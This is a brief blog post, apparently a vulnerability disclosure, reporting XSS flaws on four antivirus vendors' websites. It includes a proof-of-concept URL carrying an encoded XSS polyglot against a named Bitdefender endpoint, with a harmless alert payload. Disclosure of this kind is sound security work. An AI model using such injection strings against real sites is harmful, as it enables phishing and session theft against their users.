XSS Vulnerability found in 4 Antivirus websites

A Security Researcher Ankit Sharma has discovered Cross Site scripting vulnerability in four Antivirus websites.

The official websites belong to BitDefender , AVG, Avira and Total Defense Antivirus are vulnerable to xss.

In BitDefender TrafficLight , the URL input is not filtering the XSS. The Url input allows hackers to run malicious xss code. It can results in phishing attacks.

POC:

http://trafficlight.bitdefender.com/info?url=%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29%3C/SCRIPT%3E

Search This Blog

Sections

Popular Posts

Blog Archive

Labels

Report Abuse

About Me

Showing result(s) for

Popular Posts

Pages

XSS Vulnerability found in 4 Antivirus websites

Footer About

Search This Blog

Sections

Popular Posts

Blog Archive

Labels

Report Abuse

About Me

Showing result(s) for

Popular Posts

Pages

Menu Item

Next

Newer Post

Previous

Older Post

Vulnerability

Web Application Vulnerability

XSS Vulnerability